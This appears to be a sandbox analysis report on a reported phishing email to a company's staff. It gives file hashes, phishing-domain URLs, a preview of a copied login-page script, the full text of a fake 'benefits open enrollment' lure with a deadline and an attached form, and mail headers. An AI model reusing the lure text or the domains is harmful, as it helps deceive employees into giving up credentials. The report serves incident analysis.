                                          SSDEEP:
                                          MD5:309B41EE7A44BD51E5D1B52CCC620E5B
                                          SHA1:B162CE55DE01BF7C005F8CE4D4D7C32E7AEACA08
                                          SHA-256:F213507641FD02EC43981535823474ECFDE973D1B33A6CD385F1F0827FD4B528
                                          SHA-512:9279138126F8FEDD3AEF32BA4BCD78D3D26BBD4E7DE6F3B21014B96C34D7E69BC4C6471CC94772346CB6C7F9020EB5FE1A3A96686A5B250F5CCDEE54A0936F4D
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/images/hip_text.gif
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):12980
                                          Entropy (8bit):4.656952280411437
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8EDFCD3F7A179CFF6B123DFF50F29770
                                          SHA1:7A2D9BB4B9F6072AB3049E6421021A5BA0A3DADF
                                          SHA-256:D0B747C7F7414A08B0D5107832B2F4BB44A9BB4A3AAD28390F58EDE8BBEA6AE1
                                          SHA-512:169D1C71078DCB1C65B3CBAFBA3379B94718D6C1E472990666430A6B2C0483CC9B27E13820A29D2DCA2364D3CD3F7D2ECDED48B9ACF406BF74CB505489FB9503
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/js/Button.js?v=1342177280
                                          Preview:.//------------------------------------------------------------..// Copyright (c) Microsoft Corporation. All rights reserved...//------------------------------------------------------------....var Button = new Object();....Button.ActiveButton = null;..Button.FocusButton = null;..Button.DefaultButton = null;..Button.CancelButton = null;..Button.ActivatedButtonID = null;..Button.Groups = {};....Button.SetText = function(id, text) {.. var button = document.getElementById(id);.. if (button != null) {.. for (var i = 0; i < button.children.length; i++) {.. var ch = button.children[i];.. if (ch.tagName.toLowerCase() == 'span') {.. ch.innerHTML = text; //// TODO: this causes the text wrapped with an <a> tag to get inserted in Firefox, which needs to get fixed... break;.. }.. }.. }.. var span = document.getElementById(id + '_disabled');.. if (span != null) {.. for (var i = 0; i < span.childr
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 17 x 25, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):471
                                          Entropy (8bit):7.197252382638843
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C651D60A08FF0F579E2EB9BE6043A3C6
                                          SHA1:E7BCBB896EEA20A4DC68EDD2EF5B336E92690A55
                                          SHA-256:7B4B6ADAA1DDA648143A18A52B51DFAAB54775BDB6284DFF5C869235CD385230
                                          SHA-512:017C29423F096A45AD5D1002B2F14E27A8298F144A962B78F46A96626A1027D5E4EC57468CD8F8C5B9E97461FA651452A1786CD9F5F76264652D03F55D516138
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 89501
                                          Category:downloaded
                                          Size (bytes):30947
                                          Entropy (8bit):7.991365257160597
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:08DF9F54C9E2E91DB3AADC1BAFF368A5
                                          SHA1:A8E6C9343489D3C36CF262A10F59D22540248C49
                                          SHA-256:417453D1FCABA01D9543B7649FC12EE865E118714D5F86A8316216E9BB4FDD20
                                          SHA-512:1328AB52B081560038BE0F34219B8C877CB35A7C0DFBA869373985753CF827478F6B41D0846CA3FC877C275E7C89FDA0598F822D4CC0D7F4EAE6BB8B72483B24
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://2ac4b5bb-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ajax/jQuery/jquery-3.6.0.min.js
                                          File type:CDFV2 Microsoft Outlook Message
                                          Entropy (8bit):5.359111436112627
                                          TrID:
                                          • Outlook Message (71009/1) 58.92%
                                          • Outlook Form Template (41509/1) 34.44%
                                          • Generic OLE2 / Multistream Compound File (8008/1) 6.64%
                                          File name:44zg1cvu.msg
                                          File size:211'968 bytes
                                          MD5:42b3b3e14a1c514a7647e2916c6f4cb5
                                          SHA1:b4db942f9d4ab74ee0c488433f083d273fad0c86
                                          SHA256:e66b870ef3fa0efb51d0912366587a5c2033a7b582088bac6e899c2cf366e897
                                          SHA512:4dbc8bd1ee635673b0bcde134a6c740e673f4f60fd2e25af10f473f2df3763b94eba65176153a62cfb76b70dd357b527293eae8ad8c30a6cd48ff71ee42a80f5
                                          SSDEEP:3072:3T21CMrS62CVP1fC6xyYpGi7cGU2EiaZHy7N21:j21/x2Cd1fhqS8ZZSp
                                          TLSH:3424C8143EE66125F2B3AE3506EB9097D53BFC926D28C54EA142774D0A71A01EC72F3B
                                          Subject:FW: BENEFITS OPEN ENROLLMENT 2024-2025 - PLEASE READ for Scott-electric | Friday, 28th of June 2024 | m144zg1cvu
                                          From:Sarah Moore <sarah@scott-electric.com>
                                          To:CoreRecon Support <support@corerecon.com>
                                          Cc:
                                          BCC:
                                          Date:Fri, 28 Jun 2024 18:26:55 +0200
                                          Communications:
                                          • This is not an email that we generated, however, we use employee navigator. I'm afraid someone has hacked into our benefits portal or something. Please look into this asap.
                                          • From: Melodi Bunn <melodi@scott-electric.com>
                                            Sent: Friday, June 28, 2024 11:25 AM
                                            To: Sarah Moore <sarah@scott-electric.com>
                                            Subject: FW: BENEFITS OPEN ENROLLMENT 2024-2025 - PLEASE READ for Scott-electric | Friday, 28th of June 2024 | m144zg1cvu
                                            Importance: High
                                          • From: HR Management Scott-electric <noreply@netchexonline.com <mailto:noreply@netchexonline.com> >
                                            Sent: Friday, June 28, 2024 11:20 AM
                                            To: Melodi Bunn <melodi@scott-electric.com <mailto:melodi@scott-electric.com> >
                                            Subject: BENEFITS OPEN ENROLLMENT 2024-2025 - PLEASE READ for Scott-electric | Friday, 28th of June 2024 | m144zg1cvu
                                            Importance: High

                                            This email was sent from outside your organisation, yet is displaying the name of someone from your organisation. This often happens in phishing attempts. Please only interact with this email if you know its source and that the content is safe.

                                            We are excited to announce that Open Enrollment for your 2024 benefits is now open! This is your opportunity to make choices that will ensure you have the coverage you need for the upcoming year.

                                            Key Details:
                                            * Open Enrollment Period: June 27, 2024, through July 2, 2024.
                                            * Access Employee Navigator: Attached is the form to access and review your options.
                                            * All employees must Elect or Decline benefits by July 2, 2024.

                                            What You Need to Do:
                                            1. Select and review the New Benefit Coverage: Take the time to understand your current health, dental, vision, and supplemental insurance plans. Ensure they still align with your needs.
                                            2. Assess Your Needs: Consider any changes in your life or healthcare requirements that may necessitate adjustments to your coverage.
                                            3. Select Your Plans: Choose the insurance plans that best fit your circumstances for the coming year. You will need to select the benefit plan you want, as your old plan will not roll over.
                                            4. Waiving Coverage: If you decide to decline the benefits offered, you are required to acknowledge your decision during the enrollment process.
                                            5. Enrollment Deadline: Be aware of the enrollment deadline of July 2, 2024, as late submissions may result in losing coverage.

                                            Get Help: If you have questions or need assistance during the enrollment process, don't hesitate to reach out to our HR department.

                                            We encourage every employee to participate actively in Open Enrollment to ensure your benefits meet your needs in the coming year. Thank you for being a valued member of the Scott-electric team, and we look forward to helping you make informed choices regarding your benefits.

                                            Warm regards,
                                            Human Resources Manager
                                            Scott-electric
                                            <https://u14584191.ct.sendgrid.net/wf/open?upn=u001.rMjSeMFaqWw9i-2F-2B5yeCMi5l9r5xkM-2Bl6Fzf9atq9mDHemw-2F5xPBBVpbqcQVStsUqu2-2BzOtxIdSFJcypWVNF4O0BmTV0HebiNy6JxZbdA8OWhyg-2Ft2X6jUF7nGiXzHvUTn71XzEsacjInn-2FTVMdpG9yMwXsbiSByeVJmDsHiqSSrVAykirxcjYZ1Q5OeIyra7ahEfY-2Bc10N8Me7BhVEgAXHeXJdgZWmcGd8AH-2BZQ-2B6cU-3D>
                                          Attachments:
                                          • LLZ-950309.htm
                                          Key Value
                                          Received: from PH7PR16MB5878.namprd16.prod.outlook.com
                                          16:26:55 +0000
                                          ARC-Seal: i=1; a=rsa-sha256; s=arcselector9901; d=microsoft.com; cv=none;
                                          ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com;
                                          h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1;
                                          ARC-Authentication-Results: i=1; mx.microsoft.com 1; spf=pass
                                          by SJ1PR11MB6130.namprd11.prod.outlook.com (2603:10b6:a03:45f::9) with
                                          2024 16:26:55 +0000
                                          (2603:10b6:303:b7::30) with Microsoft SMTP Server (version=TLS1_2,
                                          Transport; Fri, 28 Jun 2024 16:26:58 +0000
                                          Authentication-Results: spf=pass (sender IP is 40.107.94.97)
                                          Received-SPF: Pass (protection.outlook.com: domain of scott-electric.com
                                          15.20.7677.15 via Frontend Transport; Fri, 28 Jun 2024 16:26:57 +0000
                                          by SA6PR16MB6731.namprd16.prod.outlook.com (2603:10b6:806:419::11) with
                                          ([fe80::94c2:ebd:646d:d09e%4]) with mapi id 15.20.7698.025; Fri, 28 Jun 2024
                                          From: Sarah Moore <sarah@scott-electric.com>
                                          To: CoreRecon Support <support@corerecon.com>
                                          Subject: FW: BENEFITS OPEN ENROLLMENT 2024-2025 - PLEASE READ for
                                          Thread-Topic: BENEFITS OPEN ENROLLMENT 2024-2025 - PLEASE READ for
                                          Thread-Index: AQHayXcG2Xl8FQckwkiVpv//5JPcMrHdXG9QgAAAcuA=
                                          Importance: high
                                          X-Priority: 1
                                          Date: Fri, 28 Jun 2024 16:26:55 +0000
                                          Message-ID: <PH7PR16MB58788A60AE1BC85B6F6C23BF8DD02@PH7PR16MB5878.namprd16.prod.outlook.com>
                                          References: <GNx05bbCfB3WC9FcNqD2papEiBcPnv9zHh07ajxnmY@0459e2201581797e163cfe396ba83a0e>
                                          In-Reply-To: <IA1PR16MB52622F6D56EEA940E3E425A1E2D02@IA1PR16MB5262.namprd16.prod.outlook.com>
                                          Accept-Language: en-US
                                          Content-Language: en-US
                                          X-MS-Has-Attach: yes
                                          X-MS-TNEF-Correlator: Authentication-Results-Original: dkim=none (message not signed)
                                          x-ms-traffictypediagnostic: PH7PR16MB5878:EE_|SA6PR16MB6731:EE_|SJ5PEPF000001F2:EE_|SJ1PR11MB6130:EE_|IA1PR11MB6291:EE_
                                          X-MS-Office365-Filtering-Correlation-Id: 9b44da7a-01a7-4f0c-3c89-08dc978f2180
                                          x-ms-exchange-senderadcheck: 1
                                          x-ms-exchange-antispam-relay: 0
                                          X-Microsoft-Antispam-Untrusted: BCL:0;ARA:13230040|69100299015|366016|376014|1800799024|38070700018;
                                          X-Microsoft-Antispam-Message-Info-Original: =?us-ascii?Q?1KJHhDZGMQgT+h1N0QbqTOtmR9X/FKqoaj2O5EcmVIWcHzJsxLkAY4RLF6zg?=
                                          X-Forefront-Antispam-Report-Untrusted: CIP:255.255.255.255;CTRY:;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:PH7PR16MB5878.namprd16.prod.outlook.com;PTR:;CAT:NONE;SFS:(13230040)(69100299015)(366016)(376014)(1800799024)(38070700018);DIR:OUT;SFP:1102;
                                          X-MS-Exchange-AntiSpam-MessageData-Original-ChunkCount: 1
                                          X-MS-Exchange-AntiSpam-MessageData-Original-0: =?us-ascii?Q?l4hr7tFXJ21/6NcIMQEhZDaqAIaxHoG4q9fRptWNeRAQiZEWPpVQMLIbD7Mz?=
                                          Content-Type: multipart/mixed;
                                          MIME-Version: 1.0
                                          X-MS-Exchange-Transport-CrossTenantHeadersStamped: SJ1PR11MB6130
                                          Return-Path: sarah@scott-electric.com
                                          X-MS-Exchange-Organization-ExpirationStartTime: 28 Jun 2024 16:26:57.7937
                                          X-MS-Exchange-Organization-ExpirationStartTimeReason: OriginalSubmit
                                          X-MS-Exchange-Organization-ExpirationInterval: 1:00:00:00.0000000
                                          X-MS-Exchange-Organization-ExpirationIntervalReason: OriginalSubmit
                                          X-MS-Exchange-Organization-Network-Message-Id: 9b44da7a-01a7-4f0c-3c89-08dc978f2180
                                          X-EOPAttributedMessage: 0
                                          X-EOPTenantAttributedMessage: fd95b4e8-ccc7-4e27-b8dc-ec4c54e4a14d:0
                                          X-MS-Exchange-Organization-MessageDirectionality: Incoming
                                          X-MS-Exchange-Transport-CrossTenantHeadersStripped: SJ5PEPF000001F2.namprd05.prod.outlook.com
                                          X-MS-Exchange-Transport-CrossTenantHeadersPromoted: SJ5PEPF000001F2.namprd05.prod.outlook.com
                                          X-MS-PublicTrafficType: Email
                                          X-MS-Exchange-Organization-AuthSource: SJ5PEPF000001F2.namprd05.prod.outlook.com
                                          X-MS-Exchange-Organization-AuthAs: Anonymous
                                          X-MS-Office365-Filtering-Correlation-Id-Prvs: dacbd541-1fca-4073-e8ac-08dc978f1ff5
                                          X-MS-Exchange-Organization-SCL: 1
                                          X-Microsoft-Antispam: BCL:0;ARA:13230040|35042699022|12012899012|69100299015;
                                          X-Forefront-Antispam-Report: CIP:40.107.94.97;CTRY:US;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:NAM10-MW2-obe.outbound.protection.outlook.com;PTR:mail-mw2nam10on2097.outbound.protection.outlook.com;CAT:NONE;SFS:(13230040)(35042699022)(12012899012)(69100299015);DIR:INB;
                                          X-MS-Exchange-CrossTenant-OriginalArrivalTime: 28 Jun 2024 16:26:57.5906
                                          X-MS-Exchange-CrossTenant-Network-Message-Id: 9b44da7a-01a7-4f0c-3c89-08dc978f2180
                                          X-MS-Exchange-CrossTenant-Id: fd95b4e8-ccc7-4e27-b8dc-ec4c54e4a14d
                                          X-MS-Exchange-CrossTenant-AuthSource: SJ5PEPF000001F2.namprd05.prod.outlook.com
                                          X-MS-Exchange-CrossTenant-AuthAs: Anonymous
                                          X-MS-Exchange-CrossTenant-FromEntityHeader: Internet
                                          X-MS-Exchange-Transport-EndToEndLatency: 00:00:05.9753408
                                          X-MS-Exchange-Processed-By-BccFoldering: 15.20.7698.013
                                          X-Microsoft-Antispam-Mailbox-Delivery: ucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(920097)(930097)(140003);
                                          X-Microsoft-Antispam-Message-Info: =?us-ascii?Q?31Mofrx2/PtftmgGi8mP7+/k+Jl/9i6rQ31JGkUksC8meJcczR+JXvyqUl/U?=
                                          date: Fri, 28 Jun 2024 18:26:55 +0200

                                          Icon Hash:c4e1928eacb280a2